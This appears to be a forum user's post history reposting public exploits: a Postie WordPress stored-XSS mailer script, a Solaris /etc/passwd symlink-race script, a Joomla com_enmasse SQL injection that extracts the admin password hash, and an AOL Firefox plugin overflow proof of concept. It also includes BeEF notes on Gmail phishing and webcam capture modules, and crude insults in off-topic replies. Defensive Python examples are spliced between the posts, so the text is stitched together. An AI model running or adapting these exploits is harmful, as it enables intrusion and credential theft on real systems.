Everything posted by DarkyAngel
-
Wordpress Postie Plugin 1.4.3 Stored XSS
EDB-ID: 20360 | CVE: 2012-2580 | OSVDB-ID: N/A
Author: loneferret | Published: 2012-08-08

#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: Postie
Version: 1.4.3
Software Download: http://wordpress.org/extend/plugins/postie/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update received from CERT. Vendor was advised to contact researcher. No other contact received.
08 Aug 2012: Public Disclosure

Installed On: Ubuntu Server LAMP 8.04
Wordpress: 3.3.1
Client Test OS: MAC OS Lion
Browser Used: Firefox 12

Injection Point: From
Injection Payload(s):
1: <BODY ONLOAD=alert('XSS')>
2: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
'''

import smtplib

payload = """<BODY ONLOAD=alert('XSS')>"""


def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # The payload is appended to the From header, which Postie stores and renders unescaped
    msg = "From: hacker@offsec.local" + payload + "\n"
    msg += "To: victim@victim.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: Offensive Security\n"
    msg += "Content-type: text/html\n\n"
    msg += "XSS\r\n\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception as e:
        print("[-] Failed to send email:")
        print("[*] " + str(e))
    server.quit()


username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print("[*] Sending Email")
sendMail(dstemail, frmemail, smtpsrv, username, password)

Sursa
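An added example, not from the advisory or from the Postie plugin: the bug above is that the From header of an inbound mail reaches the WordPress page unescaped. This Python script parses a constructed message whose From header carries the same payload shape, flags rendered headers that contain markup so they can be logged or quarantined, and shows the output escaping the plugin should have applied. The sample message bytes, the header list and the function names are assumptions of this example.

```python
import html
import re
from email import message_from_bytes

# Constructed sample message: the From header carries markup of the kind the
# advisory injects; no real mailbox is involved.
RAW_MESSAGE = (
    b"From: sender@example.invalid<BODY ONLOAD=alert('XSS')>\r\n"
    b"To: inbox@example.invalid\r\n"
    b"Subject: Offensive Security\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"XSS\r\n"
)

# Headers a mail-to-post plugin typically copies into page content (assumed).
RENDERED_HEADERS = ("From", "Subject", "To")

# A '<' that starts an HTML tag or comment: '<' then a tag name followed by
# whitespace, '>' or '/', or '<!'. A legitimate angle-addr such as
# "Alice <alice@example.invalid>" has '@' right after the local part and does
# not match.
_MARKUP_RE = re.compile(r"<\s*(?:!|/?[A-Za-z][A-Za-z0-9-]*(?=[\s>/]))")


def header_has_markup(value: str) -> bool:
    """True when a header value contains something that parses as an HTML tag."""
    return _MARKUP_RE.search(value) is not None


def render_header(value: str) -> str:
    """What the plugin should do before echoing a header into a post: escape it."""
    return html.escape(value, quote=True)


def triage(raw: bytes) -> dict:
    """Parse a raw message, report which rendered headers carry markup and
    return the escaped form of the From header."""
    msg = message_from_bytes(raw)
    suspicious = [h for h in RENDERED_HEADERS if header_has_markup(msg.get(h, ""))]
    from_raw = msg.get("From", "")
    return {
        "from_raw": from_raw,
        "safe_from": render_header(from_raw),
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    result = triage(RAW_MESSAGE)
    print("headers with markup:", result["suspicious"])
    print("escaped From:", result["safe_from"])
```

The detection regex is deliberately narrow so that ordinary address syntax (`Name <user@host>`) never trips it; escaping on output is the actual fix, detection only tells you that someone tried.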
-
Bypassing antivirus with a sharp syringe
Author: Hasan aka inf0g33k
Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf
-
we'll let you start first. we hope you don't come back after the ban!
-
what interesting goals there were yesterday at Barca-Dinamo // I wonder if it'll rain tomorrow?
-
and that's exactly why the topic deserves to be closed. that's exactly what this unfucked woman is looking for: attention! at "work" the kids couldn't give a fuck about her, so she's looking for a moment of attention online too..
-
Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation
EDB-ID: 20418 | CVE: N/A | OSVDB-ID: N/A
Author: Larry Cashdollar | Published: 2012-08-11
Source: http://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on affected computers.

#!/usr/bin/perl
# Poll the process list for the patch's inetd-upgrade script and plant the
# symlink under the predictable /tmp name it writes through.
$clobber = "/etc/passwd";
while (1) {
    open ps, "ps -ef | grep -v grep | grep -v PID |";
    while (<ps>) {
        @args = split " ", $_;
        if (/inetd-upgrade/) {
            print "Symlinking iconf_entries.$args[1] to $clobber\n";
            symlink($clobber, "/tmp/iconf_entries.$args[1]");
            exit(1);
        }
    }
    close(ps);
}

Sursa
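An added example, not part of the advisory and not Solaris code: the bug class above is a privileged process writing to a predictable name under /tmp through whatever already sits there. The Python below places a symlink at a predictable name inside a throwaway directory and contrasts the naive open-for-write (which follows the link and overwrites the target) with an `O_CREAT|O_EXCL|O_NOFOLLOW` open that refuses, then shows `tempfile.mkstemp` as the pattern that removes the race entirely. The directory layout, file names and contents are constructed for the demo.

```python
import os
import tempfile


def write_private_file(path: str, data: bytes) -> bool:
    """Create `path` and write `data`, refusing to go through a pre-planted
    symlink or to reuse any existing file. Returns True on success, False when
    something already sits at that name (a file or a symlink, dangling or not)."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except FileExistsError:
        # O_EXCL makes the kernel refuse when the name exists, symlinks
        # included, so a race-planted link cannot redirect the write.
        return False
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return True


def write_naive(path: str, data: bytes) -> None:
    """The pattern the advisory abuses: a plain open-for-write follows a symlink."""
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> dict:
    """Plant a symlink at a predictable temp name and compare both writers."""
    workdir = tempfile.mkdtemp()
    protected = os.path.join(workdir, "protected.txt")  # stands in for /etc/passwd
    with open(protected, "wb") as fh:
        fh.write(b"original\n")

    planted = os.path.join(workdir, "iconf_entries.1234")  # predictable name
    os.symlink(protected, planted)

    refused = not write_private_file(planted, b"planted data\n")
    with open(protected, "rb") as fh:
        after_safe = fh.read()

    write_naive(planted, b"planted data\n")
    with open(protected, "rb") as fh:
        after_naive = fh.read()

    # The fix that removes the race: let the OS pick an unpredictable name and
    # hand back the already-open descriptor, so there is no name to pre-plant.
    fd, fresh = tempfile.mkstemp(dir=workdir, prefix="iconf_entries.")
    with os.fdopen(fd, "wb") as fh:
        fh.write(b"entries\n")
    fresh_ok = os.path.isfile(fresh) and not os.path.islink(fresh)

    return {
        "refused": refused,
        "protected_after_safe": after_safe,
        "protected_after_naive": after_naive,
        "random_name_ok": fresh_ok,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

`O_NOFOLLOW` is looked up with `getattr` so the script still runs on platforms without it; `O_EXCL` alone is what makes the planted-link case fail, `O_NOFOLLOW` additionally covers the non-creating open paths.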
-
Recently, an updated version – BeEF version 0.4.3.6 – was made available to us!

Changes made to BeEF 0.4.3.6:
Twitter and E-mail notifications (thanks @marcwickenden): we have a new extension where you can configure an SMTP server or Twitter account in order to receive automatic notifications as soon as a new browser is hooked in BeEF;
HTTPS support (thanks to one of our long-term developers, Christian @xntrik Frichot): you can now start BeEF with full HTTPS support. You should use this when you want to target HTTPS applications, especially if the user is using the latest Chrome/Firefox browsers: they do security checks for mixed content and prevent the hook from working if you use HTTP;
New Chrome extension module (thanks Mike Haworth): now you can have screenshots of the current tab the user is in;
Gmail phishing and Flash Webcam modules (thanks floyd.ch): using the first module you can log a user out of Gmail, create a fake Gmail login page, then steal the Google account credentials. With the second module, if the user clicks "Allow Webcam" in the popup created by Flash, you can get photos from his webcam at a time interval you specify;
Nat_pinning module (thanks Bart Leppens): you probably remember Samy's research on the topic. Well, we added this nice attack to BeEF, so you can have fun with it. The GlassFish exploit has been enhanced (again, thanks Bart), and we also added GlassFish fingerprinting to our internal network fingerprinting module.
Brendan @_bcoles Coles, as always, did a great job adding new modules and porting various attacks to BeEF: Spring exploit for CVE-2010-1622, lots of XSRF and some RCE modules for various embedded devices like routers and cameras (D-Link dir-615, Linksys wcv series, Cisco E2400, 3Com OfficeConnect ADSL Wireless 11g, Asmax AR-804gu). Other than that, he also added enhanced fingerprinting for various mobile devices, and the balloon dialogs for the admin web-gui.
Let @beefproject know if you want more/different stuff in this dialog.
Michele @antisnatchor Orru, apart from bugfixes, added the confirm_close_tab module, in order to achieve better hook persistence and annoy the user (basically the user is asked for confirmation - in a loop - when he's closing the hooked tab). Another bunch of changes he worked on were about the AssetHandler (you can now bind/unbind raw sockets in BeEF, useful for example in the nat_pinning module to bind a socket on port 6667), the RESTful API (added a /api/modules/multi endpoint that you can now use to launch multiple modules at once against a single target) and the admin web-gui (added a JSON endpoint that enables you to call the RESTful API from ExtJS).

Download BeEF: BeEF 0.4.3.6 - beef-0.4.3.6.zip
Sursa
-
[Medium/Hard] Oracle SQL Injection [Contest + Prizes] #3
DarkyAngel replied to Sheyken's topic in Challenges (CTF)
#prize nr3?
-
that's why you need 10 posts for the Requests / Help categories. @edutu20, you have the "Sugestii" (Suggestions) category
-
[Easy/Medium] MySQL Injection Challenge [Contest with Prizes].
DarkyAngel replied to Sheyken's topic in Challenges (CTF)
#pm sent.
-
a symlink is like a shortcut in Windows, it "shortens the path to the file"; when you access the file through the symlink, it isn't in your directory but in the original directory you made the symlink to. And stop with the offtopic.
-
Joomla En Masse Component 1.2.0.4 SQL Injection

# Exploit Title: Joomla com_enmasse Remote Exploit
# Author: Daniel Barragan "D4NB4R"
# hi, this exploit affects ecommerce sites so the exploit only gives a sample of the
# possible extraction of data, I am not responsible for any use that is given, since
# it is possible to obtain economic profit through this. The script is done with joomla default tables.

#!/usr/bin/perl -w
########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
# Dork: inurl:index.php?option=com_enmasse
# Date: [06-08-2012]
# Author: Daniel Barragan "D4NB4R"
# Twitter: @D4NB4R
# site: http://poisonsecurity.wordpress.com/
# Vendor: http://www.matamko.com/
# Version: 1.2.0.4 (last update on Jul 27, 2012)
# License: Enmasse 6 Months Support & Subscription - USD$358.20
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
# Tested on: [Linux(bt5)-Windows(7ultimate)]
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....
########################################
use LWP::UserAgent;

print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";

print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target = <STDIN>);

# Pieces of the error-based injection that goes into the sortBy parameter
$concatene  = "concat(password)";
$table      = "jos_users";
$d4nb4r     = "floor";
$com        = "com_enmasse";
$seleccione = "select";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=" . $com . "&sortBy=117 and(" . $seleccione . " 1 from(" . $seleccione . " count(*),concat((" . $seleccione . " (" . $seleccione . " (" . $seleccione . " " . $concatene . " from " . $table . " Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C" . $d4nb4r . "(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";

$res    = $b->request(HTTP::Request->new(GET => $host));
$answer = $res->content;

# The duplicate-key error echoes the selected value back; pick the 32-char hash out of it
if ($answer =~ /([0-:a-fA-F]{32})/) {
    print "\n Hash Admin : $1\n\n";
    print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
    print " The exploit was successful if you want to see more data modify the script\n";
} else {
    print "\n[-] No se pudo, intente manualmente\n";
}
#####Daniel Barragan D4NB4R 2012################

Sursa
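An added example, not from the advisory and not Joomla or En Masse code: the injection above lands in the `sortBy` parameter, i.e. an ORDER BY position, which cannot be protected by a bound parameter. The Python below builds a constructed in-memory SQLite table, shows the vulnerable shape (request value pasted into ORDER BY, so a subquery against the schema catalogue runs unhindered) next to the hardened shape (sort key taken from an allow-list, data values bound as parameters). Table layout, column names and the allow-list are assumptions of this example.

```python
import sqlite3

# Sort keys a caller may request, mapped to the SQL actually emitted. Only
# these strings ever reach the query text.
SORT_COLUMNS = {
    "price": "price ASC",
    "name": "name ASC",
    "newest": "created DESC",
}


def build_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the component's deals."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE deals (id INTEGER, name TEXT, price REAL, created TEXT)")
    conn.executemany(
        "INSERT INTO deals VALUES (?, ?, ?, ?)",
        [
            (1, "lunch", 9.5, "2012-07-01"),
            (2, "spa", 40.0, "2012-07-20"),
            (3, "cinema", 6.0, "2012-07-10"),
        ],
    )
    return conn


def list_deals_unsafe(conn, sort_by: str):
    """The vulnerable shape: the request parameter is pasted into ORDER BY,
    so any expression, including subqueries, is executed as SQL."""
    return conn.execute("SELECT id, name FROM deals ORDER BY " + sort_by).fetchall()


def list_deals_safe(conn, sort_by: str, keyword: str = ""):
    """Hardened: ORDER BY text comes from the allow-list, the keyword is a
    bound parameter. Unknown sort keys are rejected, not interpreted."""
    try:
        order = SORT_COLUMNS[sort_by]
    except KeyError:
        raise ValueError("unknown sortBy value: %r" % sort_by)
    return conn.execute(
        "SELECT id, name FROM deals WHERE name LIKE ? ORDER BY " + order,
        ("%" + keyword + "%",),
    ).fetchall()


def sort_by_is_rejected(conn, sort_by: str) -> bool:
    """Convenience check: does the hardened query refuse this sort key?"""
    try:
        list_deals_safe(conn, sort_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    probe = "price, (select count(*) from sqlite_master)"
    print("unsafe, probe accepted:", list_deals_unsafe(db, probe))
    print("safe, probe rejected:", sort_by_is_rejected(db, probe))
    print("safe, by price:", list_deals_safe(db, "price"))
```

The allow-list is a dict rather than a list on purpose: the client-facing key and the SQL fragment are decoupled, so renaming a column never exposes the physical schema, and the fragment can carry the sort direction too.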
-
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution

tested against:
Microsoft Windows Vista sp2
Microsoft Windows Server 2003 r2 sp2
Mozilla Firefox 14.0.1

download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)
see also the installer aol_toolbar_pricecheck.exe
url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown00000043

vulnerability:
the mentioned product installs a Firefox plugin:
File: npdnupdater2.dll
Version: 1.3.0.0
Name: npdnupdater2
Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll
Mime type: applicatiotn/x-vend.aol.dnupdater2.1
Extension: ocp

By embedding this plugin inside an html page it is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter.

Example crash:

EAX 00000000
ECX 01101470
EDX 01135208 ASCII "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
EBX 00000000
ESP 0013F618
EBP 0013F634
ESI 00000002
EDI 0013F668
EIP 61616161
C 1  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 1  FS 003B 32bit 7FFDD000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr 00000000 ERROR_SUCCESS
EFL 00000297 (NO,B,NE,BE,S,PE,L,LE)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 8.0000000000000000000
ST7 empty 0.2500000000000000000 CONST 1/4.
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
Last cmnd 001B:10571FBD xul.10571FBD
XMM0 00000000 00000000 00000000 00000000
XMM1 61616161 61616161 61616161 61616161
XMM2 61616161 61616161 61616161 61616161
XMM3 61616161 61616161 61616161 61616161
XMM4 61616161 61616161 61616161 61616161
XMM5 61616161 61616161 61616161 61616161
XMM6 61616161 61616161 61616161 61616161
XMM7 61616161 61616161 61616161 61616161
                   P U O Z D I
MXCSR 00001F80  FZ 0  DZ 0  Err 0 0 0 0 0 0  Rnd NEAR  Mask 1 1 1 1 1 1

EIP is overwritten; EDX also points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code.

A copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll:

CPU Disasm
Address   Hex dump          Command                                   Comments
01A91C10  /$ 55             PUSH EBP                                  ; npdnupdater2.01A91C10(guessed Arg1)
01A91C11  |. 56             PUSH ESI
01A91C12  |. 8BE9           MOV EBP,ECX
01A91C14  |. 57             PUSH EDI
01A91C15  |. 8B7C24 10      MOV EDI,DWORD PTR SS:[ARG.1]
01A91C19  |. C745 00 9CA2A  MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C
01A91C20  |. 8B07           MOV EAX,DWORD PTR DS:[EDI]
01A91C22  |. 33F6           XOR ESI,ESI
01A91C24  |. 8945 04        MOV DWORD PTR SS:[EBP+4],EAX
01A91C27  |. C645 08 00     MOV BYTE PTR SS:[EBP+8],0
01A91C2B  |. C745 10 00000  MOV DWORD PTR SS:[EBP+10],0
01A91C32  |. 66:3977 0A     CMP WORD PTR DS:[EDI+0A],SI
01A91C36  |. 7E 3E          JLE SHORT 01A91C76
01A91C38  |. EB 06          JMP SHORT 01A91C40
01A91C3A  |  8D9B 00000000  LEA EBX,[EBX]
01A91C40  |> 8B4F 0C        /MOV ECX,DWORD PTR DS:[EDI+0C]
01A91C43  |. 8B14B1         |MOV EDX,DWORD PTR DS:[ESI*4+ECX]
01A91C46  |. 68 D4A2A901    |PUSH OFFSET 01A9A2D4                    ; /Arg2 = ASCII "SRC"
01A91C4B  |. 52             |PUSH EDX                                ; |Arg1
01A91C4C  |. E8 E06F0000    |CALL 01A98C31 <-------------            ; \npdnupdater2.01A98C31
01A91C51  |. 83C4 08        |ADD ESP,8
01A91C54  |. 85C0           |TEST EAX,EAX
01A91C56  |. 75 15          |JNE SHORT 01A91C6D
01A91C58  |. 8B47 10        |MOV EAX,DWORD PTR DS:[EDI+10]
01A91C5B  |. 8B0CB0         |MOV ECX,DWORD PTR DS:[ESI*4+EAX]
01A91C5E  |. BA 38CCA901    |MOV EDX,OFFSET 01A9CC38                 ; ASCII "aaaa..."
01A91C63  |> 8A01           |/MOV AL,BYTE PTR DS:[ECX] <----------------- [*]
01A91C65  |. 41             ||INC ECX
01A91C66  |. 8802           ||MOV BYTE PTR DS:[EDX],AL
01A91C68  |. 42             ||INC EDX
01A91C69  |. 84C0           ||TEST AL,AL
01A91C6B  |.^ 75 F6         |\JNE SHORT 01A91C63
01A91C6D  |> 0FBF4F 0A      |MOVSX ECX,WORD PTR DS:[EDI+0A]
01A91C71  |. 46             |INC ESI
01A91C72  |. 3BF1           |CMP ESI,ECX
01A91C74  |.^ 7C CA         \JL SHORT 01A91C40
01A91C76  |> 5F             POP EDI
01A91C77  |. 5E             POP ESI
01A91C78  |. 8BC5           MOV EAX,EBP
01A91C7A  |. 5D             POP EBP
01A91C7B  \. C2 0400        RETN 4
01A91C7E     CC             INT3
01A91C7F     CC             INT3
01A91C80  /. 8B4424 04      MOV EAX,DWORD PTR SS:[ARG.1]
01A91C84  |. 85C0           TEST EAX,EAX
01A91C86  |. 56             PUSH ESI
01A91C87  |. 8BF1           MOV ESI,ECX
01A91C89  |. 74 09          JE SHORT 01A91C94
01A91C8B  |. 8B00           MOV EAX,DWORD PTR DS:[EAX]
01A91C8D  |. 85C0           TEST EAX,EAX
01A91C8F  |. 8946 0C        MOV DWORD PTR DS:[ESI+0C],EAX
01A91C92  |. 75 06          JNE SHORT 01A91C9A
01A91C94  |> 32C0           XOR AL,AL
01A91C96  |. 5E             POP ESI
01A91C97  |. C2 0400        RETN 4
01A91C9A  |> 57             PUSH EDI
01A91C9B  |. 8B3D 0CA1A901  MOV EDI,DWORD PTR DS:[<&USER32.SetWindow
01A91CA1  |. 68 501BA901    PUSH 01A91B50                            ; /NewValue = npdnupdater2.1A91B50
01A91CA6  |. 6A FC          PUSH -4                                  ; |Index = GWL_WNDPROC
01A91CA8  |. 50             PUSH EAX                                 ; |hWnd
01A91CA9  |. FFD7           CALL EDI                                 ; \USER32.SetWindowLongA
01A91CAB  |. 56             PUSH ESI
01A91CAC  |. A3 3CDCA901    MOV DWORD PTR DS:[1A9DC3C],EAX
01A91CB1  |. 8B46 0C        MOV EAX,DWORD PTR DS:[ESI+0C]
01A91CB4  |. 6A EB          PUSH -15
01A91CB6  |. 50             PUSH EAX
01A91CB7  |. FFD7           CALL EDI
01A91CB9  |. B0 01          MOV AL,1
01A91CBB  |. 5F             POP EDI
01A91CBC  |. 8846 08        MOV BYTE PTR DS:[ESI+8],AL
01A91CBF  |. 5E             POP ESI
01A91CC0  \. C2 0400        RETN 4
...
01A98C31  /$ 55             PUSH EBP                                 ; npdnupdater2.01A98C31(guessed Arg1,Arg2)
01A98C32  |. 8BEC           MOV EBP,ESP
01A98C34  |. 51             PUSH ECX
01A98C35  |. 53             PUSH EBX
01A98C36  |. E8 C9BDFFFF    CALL 01A94A04                            ; [npdnupdater2.01A94A04
...
...

CPU Disasm
Address   Hex dump          Command                                   Comments
01A94A04  /$ 53             PUSH EBX                                 ; npdnupdater2.01A94A04(guessed void)
01A94A05  |. 56             PUSH ESI
01A94A06  |. FF15 14A0A901  CALL DWORD PTR DS:[<&KERNEL32.GetLastErr ; [NTDLL.RtlGetLastWin32Error
01A94A0C  |. FF35 9CC1A901  PUSH DWORD PTR DS:[1A9C19C]
01A94A12  |. 8BD8           MOV EBX,EAX
01A94A14  |. FF15 BCDDA901  CALL DWORD PTR DS:[1A9DDBC] <------------------------------------- [**] boom!
...
...
01A9DDBC  61  POPAD <--------------boom!!
01A9DDBD  61  POPAD
01A9DDBE  61  POPAD
01A9DDBF  61  POPAD
01A9DDC0  61  POPAD
01A9DDC1  61  POPAD
01A9DDC2  61  POPAD
01A9DDC3  61  POPAD
01A9DDC4  61  POPAD
...

PoC:

<!--
AOL Products downloadUpdater2 Plugin for Firefox Remote Code Execution
File: npdnupdater2.dll
Version: 1.3.0.0
Name: npdnupdater2
Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll
rgod
-->
<!-- saved from url=(0014)about:internet -->
<EMBED TYPE="applicatiotn/x-vend.aol.dnupdater2.1" SRC="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
